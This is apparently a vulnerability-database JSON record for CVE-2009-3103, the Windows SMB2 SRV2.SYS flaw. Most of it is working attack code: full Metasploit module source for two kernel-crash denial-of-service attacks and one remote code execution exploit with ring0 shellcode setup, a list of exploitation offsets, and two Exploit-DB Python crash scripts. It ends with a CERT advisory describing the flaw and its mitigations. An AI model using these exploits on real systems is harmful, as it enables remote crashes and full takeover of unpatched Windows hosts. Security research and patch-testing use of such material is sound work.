{"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/DOS/WINDOWS/SMB/MS09_050_SMB2_SESSION_LOGOFF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference',\n 'Description' => %q{\n This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing\n an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.\n Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.\n },\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-3103'],\n [ 'OSVDB', '57799' ],\n [ 'MSB', 'MS09-050' ],\n ]\n ))\n\n register_options( [ Opt::RPORT( 445 ) ])\n end\n\n def run\n print_status( \"Targeting host #{datastore['RHOST']}:#{datastore['RPORT']}...\" )\n connect\n\n dialects = [ \"AAAA\" + [ 0xDEADC0DE ].pack( \"V\" ) + [ 0xCAFEF00D ].pack( \"V\" ), \"SMB 2.002\" ]\n\n data = dialects.collect { |dialect| \"\\x02\" + dialect + \"\\x00\" }.join( '' )\n data += \"A\" * 128\n\n packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct\n\n packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE\n packet['Payload']['SMB'].v['Flags1'] = 0x18\n packet['Payload']['SMB'].v['Flags2'] = 0xC853\n packet['Payload']['SMB'].v['ProcessIDHigh'] = Rex::Proto::SMB::Constants::SMB2_OP_LOGOFF\n packet['Payload'].v['Payload'] = data\n\n packet = packet.to_s\n\n print_status( \"Sending the exploit packet (#{packet.length} bytes)...\" )\n sock.put( packet )\n\n response = sock.get_once\n\n if( not response )\n print_status( \"No response. The target system has probably crashed.\" )\n else\n print_status( \"Response received. The target system is not vulnerable:\\n#{response.inspect}\" )\n end\n\n disconnect\n end\nend\n\n=begin\n\nSome WinDbg output from a vulnerable Vista SP2 machine:\n\nCONTEXT:\neax=0032bfbc ebx=9beafb20 ecx=0000000a edx=00000000 esi=00000000 edi=9be8e690\neip=9935a9d1 esp=98b86cb8 ebp=98b86cc0 iopl=0 nv up ei pl nz na po nc\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202\nsrv2!RfsTableLookup+0xa:\n9935a9d1 837e4800 cmp dword ptr [esi+48h],0 ds:0023:00000048=????????\n\nSTACK_TEXT:\n98b86cc0 99359f95 00000000 0032bfbc 9be8e830 srv2!RfsTableLookup+0xa\n98b86cdc 99364328 9be8e690 DEADC0DE CAFEF00D srv2!SrvVerifySessionEx+0xdc\n98b86d00 9935a6cc 9be8e690 00000000 9be8e690 srv2!Smb2ValidateLogoff+0x3c\n98b86d3c 99374a7f 9be8e690 98c1e018 9be8e690 srv2!Smb2ValidateProviderCallback+0x501\n98b86d50 9937319f 9be8e690 00000000 98c4f020 srv2!SrvProcessPacket+0x4b\n98b86d7c 81a0ec42 00000000 b52bf019 00000000 srv2!SrvProcWorkerThread+0x19a\n98b86dc0 81877efe 99373005 98c1e018 00000000 nt!PspSystemThreadStartup+0x9d\n00000000 00000000 00000000 00000000 00000000 nt!KiThreadStartup+0x16\n=end\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb"}, {"lastseen": "2018-09-24T13:32:59", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "references": [], "description": "This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.", "reporter": "Rapid7", "published": "2010-04-15T16:08:27", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb", "type": "metasploit", "title": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2018-09-15T23:54:45", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/DOS/WINDOWS/SMB/MS09_050_SMB2_NEGOTIATE_PIDHIGH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',\n 'Description' => %q{\n This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows\tVista\n without SP1 does not seem affected by this flaw.\n },\n\n 'Author' => [ 'Laurent Gaffie <laurent.gaffie[at]gmail.com>', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2009-3103'],\n ['BID', '36299'],\n ['OSVDB', '57799'],\n ['MSB', 'MS09-050'],\n ['URL', 'https://seclists.org/fulldisclosure/2009/Sep/0039.html'],\n ['URL', 'http://www.microsoft.com/technet/security/advisory/975497.mspx']\n ]\n ))\n register_options([\n Opt::RPORT(445),\n OptInt.new('OFFSET', [true, 'The function table offset to call', 0xffff])\n ])\n\n end\n\n\n def run\n connect()\n\n # The SMB 2 dialect must be there\n dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002']\n data = dialects.collect { |dialect| \"\\x02\" + dialect + \"\\x00\" }.join('')\n\n pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc853\n pkt['Payload'].v['Payload'] = data\n\n pkt['Payload']['SMB'].v['ProcessIDHigh'] = datastore['OFFSET'].to_i\n pkt['Payload']['SMB'].v['ProcessID'] = 0\n pkt['Payload']['SMB'].v['MultiplexID'] = rand(0x10000)\n\n print_status(\"Sending request and waiting for a reply...\")\n sock.put(pkt.to_s)\n r = sock.get_once\n\n if(not r)\n print_status(\"The target system has likely crashed\")\n else\n print_status(\"Response received: #{r.inspect}\")\n end\n\n disconnect()\n end\nend\n\n=begin\n\n Gaining code execution means pointing the offset to something that\n eventually causes us to run arbitrary code. The offsets below are\n a starting point for turning this into remote code execution.\n\n Offsets on Vista SP1 x64:\n 0x1B = \"SMB 2.002\"\n 0x1D = L\"SMB2Validate\"\n 0x1E = L\"SMB2Execute\"\n 0x31 = move eax, 0x00000002 + ret # causes a hang when reaced\n 0x58 = WmiQueryTraceInformation\n 0x59 = WmiTraceMessage\n 0x66 = ExAllocatePoolWithTag\n 0x67 = ExFreePool\n 0x76 = ExAllocatePoolWithTag\n 0x77 = ExFreePool\n 0x86 = ExAllocatePoolWithTag\n 0x87 = ExFreePoo\n 0x96 = ExAllocatePoolWithTag\n 0x97 = ExFreePoo\n 0xa6 = ExAllocatePoolWithTag\n 0xa7 = ExFreePoo\n 0xb9 = BugCheckEx\n 0xc7 = SrvBalanceCredits\n 0xdf = SrvNetStatistics data\n 0xe0 = SrvNetStatisticsLock\n 0x010e = SrvSnapShotScaevengerThread\n 0x011c = SrvSnapShotScavengerTimer\n 0x012a = SrvScavengerThread\n 0x0138 = SrvScavengerTimer\n 0x0146 = SrvScavengeDurableHandles\n 0x0157 = SrvScavengeDurableHandlesTimer\n 0x0166 = SrvProcessOplockBreaks\n 0x0179 = SrvProcessOplockBreakTimer\n 0x0185 = L\"XactSrv\"\n 0x01f8 = WppTraceCallback\n\n\n Offsets on Vista SP1 (no updates) x86:\n\n 0x64 = mov esp, ebp; pop ebp, ret\n 0xde = pool with tag\n\n 0 -> 99b51d6e - 8bff558bec5153568b75088b46308b98\n 1 -> 99b55967 - 8bff558bec51518b45088b48308b8958\n 2 -> 99b53e19 - 8bff558bec568b75088b4e7083791444\n 3 -> 99b55811 - 8bff558bec5151538b5d088b43708378\n 4 -> 99b53d54 - 8bff558bec56578b7d088b4770837814\n 5 -> 99b54d41 - 8bff558bec83ec145356578b7d088b47\n 6 -> 99b54c81 - 8bff558bec518b4d088b816c01000053\n 7 -> 99b66c44 - 8bff558bec518b4d088b816c01000053\n 8 -> 99b655bf - 8bff558bec518b55088b427083781471\n 9 -> 99b63ce4 - 8bff558bec518b4d088b816c01000053\n 10 -> 99b5a221 - 8bff558bec518b4d088b816c01000053\n 11 -> 99b62996 - 8bff558bec518b4d088b816c01000053\n 12 -> 99b5fab5 - 8bff558bec518b4d088b816c01000053\n 25 -> 819aca26 - 6a2468d0988981e8960beeff33d28955\n 26 -> 8186c78b - 8bff558bec83e4f86a008d451c50ff75\n 62 -> 80d40f20 - 0000000000eb45000000000000000000\n 116 -> 819273b7 - 8bff558bec83e4f883ec3c538b5d088b\n 117 -> 8192739f - 8bff558bec6a00ff7508e8df0a00005d\n 166 -> 819273b7 - 8bff558bec83e4f883ec3c538b5d088b\n 167 -> 8192739f - 8bff558bec6a00ff7508e8df0a00005d\n 194 -> 99b6b74c - 8bff558bec83ec0c0fb64d088b451c53\n 195 -> 99b683f0 - 943018c0c6fd3f49a3e8697224f83f6f\n 206 -> 99b5eeb5 - 8bff558bec83ec1ca11094b69953568b\n 217 -> 99b5eea0 - 6a0168809ab699ff151880b699c21000\n 226 -> 99b5211d - 8bff558bec83ec145356578d45f450c6\n 231 -> 8192fcd0 - 0000000014fd9281ffffffff04000000\n 237 -> 99b52108 - 6a0168009bb699ff151880b699c21000\n 382 -> 8b137500 - 000000009075138b0000000000000000\n 491 -> 8599b680 - 894518e82ee2ffff3b45087341ff7520\n 646 -> c000009a - 0000ffffffff80040000ffffffff8004\n 734 -> 802015ff - ffde03f078f8ff7f7c02f8ff3ffe01fe\n 760 -> 99b4ff28 - 8bff558bec6a00ff7514ff7510ff750c\n 804 -> 830ffc7d - 0000001722268b3e012004020010c01c\n\n\n=end\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb"}, {"lastseen": "2018-09-24T19:19:49", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.", "reporter": "Rapid7", "published": "2010-02-26T13:42:17", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb", "type": "metasploit", "title": "MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2018-09-15T23:54:45", "metasploitReliability": "Good", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS09_050_SMB2_NEGOTIATE_FUNC_INDEX", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::KernelMode\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',\n 'Description' => %q{\n This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n without SP1 does not seem affected by this flaw.\n },\n\n 'Author' => [ 'Laurent Gaffie <laurent.gaffie[at]gmail.com>', 'hdm', 'sf' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'MSB', 'MS09-050' ],\n [ 'CVE', '2009-3103' ],\n [ 'BID', '36299' ],\n [ 'OSVDB', '57799' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2009/Sep/0039.html' ],\n [ 'URL', 'http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1024,\n 'StackAdjustment' => -3500,\n 'DisableNops' => true,\n 'EncoderType' => Msf::Encoder::Type::Raw,\n 'ExtendedOptions' =>\n {\n 'Stager' => 'stager_sysenter_hook',\n }\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows Vista SP1/SP2 and Server 2008 (x86)',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X86 ],\n 'Ret' => 0xFFD00D09, # \"POP ESI; RET\" from the kernels HAL memory region ...no ASLR :)\n 'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address).\n 'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer\n 'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 07 2009'\n ))\n\n register_options(\n [\n Opt::RPORT(445),\n OptInt.new( 'WAIT', [ true, \"The number of seconds to wait for the attack to complete.\", 180 ] )\n ])\n end\n\n # Not reliable enough for automation yet\n def autofilter\n false\n end\n\n def exploit\n print_status( \"Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})...\" )\n connect\n\n # we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest\n # and srv2!SrvProcPartialCompleteCompoundedRequest\n dialects = [ [ target['ReadAddress'] ].pack(\"V\") * 25, \"SMB 2.002\" ]\n\n data = dialects.collect { |dialect| \"\\x02\" + dialect + \"\\x00\" }.join('')\n data += [ 0x00000000 ].pack(\"V\") * 37 # Must be NULL's\n data += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b)\n data += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34\n data += [ 0x42424242 ].pack(\"V\") * 7 # Unused\n data += [ target['MagicIndex'] ].pack(\"V\") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E)\n data += [ 0x41414141 ].pack(\"V\") * 6 # Unused\n data += [ target.ret ].pack(\"V\") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2\n data += payload.encoded # Our ring0 -> ring3 shellcode\n\n # We gain code execution by returning into the SMB packet, begining with its header.\n # The SMB packets Magic Header value is 0xFF534D42 which assembles to \"CALL DWORD PTR [EBX+0x4D]; INC EDX\"\n # This will cause an access violation if executed as we can never set EBX to a valid pointer.\n # To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42.\n # This assembles to \"ADD BYTE PTR [EBP+ECX*2+0x42], DL\" which is fine as ECX will be zero and EBP is a vaild pointer.\n # We patch the Signature1 value to be a jump forward into our shellcode.\n packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct\n packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE\n packet['Payload']['SMB'].v['Flags1'] = 0x18\n packet['Payload']['SMB'].v['Flags2'] = 0xC853\n packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh']\n packet['Payload']['SMB'].v['Signature1'] = 0x0158E900 # \"JMP DWORD 0x15D\" ; jump into our ring0 payload.\n packet['Payload']['SMB'].v['Signature2'] = 0x00000000 # ...\n packet['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 )\n packet['Payload'].v['Payload'] = data\n\n packet = packet.to_s\n\n print_status( \"Sending the exploit packet (#{packet.length} bytes)...\" )\n sock.put( packet )\n\n\n wtime = datastore['WAIT'].to_i\n print_status( \"Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger...\" )\n stime = Time.now.to_i\n\n\n poke_logins = %W{Guest Administrator}\n poke_logins.each do |login|\n begin\n sec = connect(false)\n sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1))\n rescue ::Exception => e\n sec.socket.close\n end\n end\n\n while( stime + wtime > Time.now.to_i )\n select(nil, nil, nil, 0.25)\n break if session_created?\n end\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb"}], "cert": [{"lastseen": "2018-12-25T20:18:16", "_object_types": ["robots.models.cert.CertBulletin", "robots.models.base.Bulletin"], "references": ["http://www.microsoft.com/technet/security/advisory/975497.mspx", "http://technet.microsoft.com/en-us/library/dd734783(WS.10).aspx", "http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html"], "description": "### Overview \n\nMicrosoft Windows Vista and Server 2008 do not correctly parse SMB version 2 messages.This vulnerability could allow an attacker to execute arbitrary code.\n\n### Description \n\nThe Server Message Block version 2 (SMBv2) protocol is the successor to the original SMB protocol. SMBv2 is available in Windows Vista, Server 2008 and Windows 7 release candidates. \n\nWindows Vista and Server 2008 fail to properly process fails to properly parse the headers for the Negotiate Protocol Request portion of an SMBv2 message. \n \n--- \n \n### Impact \n\nAn attacker may be able to execute arbitrary code or cause a vulnerable system to crash. \n \n--- \n \n### Solution \n\nThere is currently no solution to this problem. Until patches are available, users and administrators are encouraged to review the below workarounds. \n \n--- \n \n \n**Restrict access** \n \nBlocking access to ports `139/tcp` and `445/tcp` on vulnerable systems will mitigate this vulnerability. Administrators can configure mobile systems that use the Windows Firewall to open these ports only when the user is authenticated to a domain controller by using the firewall's \"[profile](<http://technet.microsoft.com/en-us/library/dd734783\\(WS.10\\).aspx>)\" feature. \n \n**Disable SMBv2** \n \nDisabling SMBv2 will mitigate this issue. The below steps to disable SMBv2 are provided in Microsoft Security Advisory [975497](<http://www.microsoft.com/technet/security/advisory/975497.mspx>).\n\n 1. Click Start, click Run, type Regedit in the Open box, and then click OK.\n 2. Locate and then click the following registry subkey:\n 3. HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\n 4. Click LanmanServer.\n 5. Click Parameters.\n 6. Right-click to add a new DWORD (32 bit) Value.\n 7. Enter smb2 in the Name data field, and change the Value data field to 0.\n 8. Exit.\n 9. From a command prompt and with administrator privileges, type `net stop server` and then `net start server`. \n--- \n \n### Vendor Information\n\n135940\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Microsoft Corporation \n\nUpdated: September 10, 2009 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/advisory/975497.mspx>\n * <http://technet.microsoft.com/en-us/library/dd734783(WS.10).aspx>\n * <http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html>\n\n### Credit\n\nThanks to Microsoft and Laurent Gaffi\u00e9 for information that was used in this report. \n\nThis document was written by Ryan Giobbi. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2009-3103](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3103>) \n---|--- \n**Severity Metric:****** | 62.70 \n**Date Public:** | 2009-09-07 \n**Date First Published:** | 2009-09-10 \n**Date Last Updated: ** | 2009-09-16 14:44 UTC \n**Document Revision: ** | 16 \n", "reporter": "CERT", "published": "2009-09-10T00:00:00", "type": "cert", "title": "Windows SMB version 2 vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2009-3103"], "_object_type": "robots.models.cert.CertBulletin", "modified": "2009-09-16T14:44:00", "id": "VU:135940", "href": "https://www.kb.cert.org/vuls/id/135940", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T11:42:59", "osvdbidlist": ["57799"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Windows 7 / Server 2008R2 Remote Kernel Crash. CVE-2009-3103. Dos exploit for windows platform", "reporter": "laurent gaffie", "published": "2009-11-11T00:00:00", "type": "exploitdb", "title": "Windows 7 / Server 2008R2 - Remote Kernel Crash", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2009-11-11T00:00:00", "id": "EDB-ID:10005", "href": "https://www.exploit-db.com/exploits/10005/", "sourceData": "#!/usr/bin/python\r\n# win7-crash.py:\r\n# Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)\r\n# Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an \r\n#infinite loop.\r\n#NO BSOD, YOU GOTTA PULL THE PLUG.\r\n#To trigger it fast; from the target: \\\\this_script_ip_addr\\BLAH , instantly crash\r\n#Author: Laurent Gaffi\u00ef\u00bf\u00bd\r\n\r\nimport SocketServer\r\n\r\npacket = (\"\\x00\\x00\\x00\\x9a\" # ---> length should be 9e not 9a..\r\n\"\\xfe\\x53\\x4d\\x42\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\r\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x41\\x00\\x01\\x00\\x02\\x02\\x00\\x00\\x30\\x82\\xa4\\x11\\xe3\\x12\\x23\\x41\"\r\n\"\\xaa\\x4b\\xad\\x99\\xfd\\x52\\x31\\x8d\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\r\n\"\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\xcf\\x73\\x67\\x74\\x62\\x60\\xca\\x01\"\r\n\"\\xcb\\x51\\xe0\\x19\\x62\\x60\\xca\\x01\\x80\\x00\\x1e\\x00\\x20\\x4c\\x4d\\x20\"\r\n\"\\x60\\x1c\\x06\\x06\\x2b\\x06\\x01\\x05\\x05\\x02\\xa0\\x12\\x30\\x10\\xa0\\x0e\"\r\n\"\\x30\\x0c\\x06\\x0a\\x2b\\x06\\x01\\x04\\x01\\x82\\x37\\x02\\x02\\x0a\")\r\n\r\n\r\nclass SMB2(SocketServer.BaseRequestHandler):\r\n\r\n def handle(self):\r\n print \"Who:\", self.client_address\r\n print \"THANKS SDL\"\r\n input = self.request.recv(1024)\r\n self.request.send(packet)\r\n self.request.close()\r\n\r\nlaunch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445\r\nlaunch.serve_forever()", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/10005/"}, {"lastseen": "2016-02-01T10:56:58", "osvdbidlist": ["57799"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln. CVE-2009-3103. Dos exploit for windows platform", "reporter": "laurent gaffie", "published": "2009-09-09T00:00:00", "type": "exploitdb", "title": "Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2009-09-09T00:00:00", "id": "EDB-ID:9594", "href": "https://www.exploit-db.com/exploits/9594/", "sourceData": "=============================================\r\n- Release date: September 7th, 2009\r\n- Discovered by: Laurent Gaffi\u00c3\u00a9\r\n- Severity: High\r\n=============================================\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\nWindows Vista, Server 2008 < R2, 7 RC :\r\nSMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nWindows vista and newer Windows comes with a new SMB version named SMB2.\r\nSee: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0\r\nfor more details.\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\n[Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS patch, for another SMB2.0 security issue:\r\nKB942624 (MS07-063)\r\nInstalling only this specific update on Vista SP0 create the following issue:\r\n\r\nSRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality.\r\nThe NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication.\r\n\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\n\r\nSmb-Bsod.py:\r\n\r\n#!/usr/bin/python\r\n#When SMB2.0 recieve a \"&\" char in the \"Process Id High\" SMB header field\r\n#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error\r\n\r\nfrom socket import socket\r\n\r\nhost = \"IP_ADDR\", 445\r\nbuff = (\r\n\"\\x00\\x00\\x00\\x90\" # Begin SMB header: Session message\r\n\"\\xff\\x53\\x4d\\x42\" # Server Component: SMB\r\n\"\\x72\\x00\\x00\\x00\" # Negociate Protocol\r\n\"\\x00\\x18\\x53\\xc8\" # Operation 0x18 & sub 0xc853\r\n\"\\x00\\x26\"# Process ID High: --> :) normal value should be \"\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xfe\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x6d\\x00\\x02\\x50\\x43\\x20\\x4e\\x45\\x54\"\r\n\"\\x57\\x4f\\x52\\x4b\\x20\\x50\\x52\\x4f\\x47\\x52\\x41\\x4d\\x20\\x31\"\r\n\"\\x2e\\x30\\x00\\x02\\x4c\\x41\\x4e\\x4d\\x41\\x4e\\x31\\x2e\\x30\\x00\"\r\n\"\\x02\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x66\\x6f\\x72\\x20\\x57\"\r\n\"\\x6f\\x72\\x6b\\x67\\x72\\x6f\\x75\\x70\\x73\\x20\\x33\\x2e\\x31\\x61\"\r\n\"\\x00\\x02\\x4c\\x4d\\x31\\x2e\\x32\\x58\\x30\\x30\\x32\\x00\\x02\\x4c\"\r\n\"\\x41\\x4e\\x4d\\x41\\x4e\\x32\\x2e\\x31\\x00\\x02\\x4e\\x54\\x20\\x4c\"\r\n\"\\x4d\\x20\\x30\\x2e\\x31\\x32\\x00\\x02\\x53\\x4d\\x42\\x20\\x32\\x2e\"\r\n\"\\x30\\x30\\x32\\x00\"\r\n)\r\ns = socket()\r\ns.connect(host)\r\ns.send(buff)\r\ns.close()\r\n\r\nV. BUSINESS IMPACT\r\n-------------------------\r\nAn attacker can remotly crash any Vista/Windows 7 machine with SMB enable.\r\nWindows Xp, 2k, are NOT affected as they dont have this driver.\r\n\r\nVI. SYSTEMS AFFECTED\r\n-------------------------\r\n[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 < R2, Windows 7 RC.\r\n\r\nVII. SOLUTION\r\n-------------------------\r\nNo patch available for the moment.\r\nClose SMB feature and ports, until a patch is provided.\r\nConfigure your firewall properly\r\nYou can also follow the MS 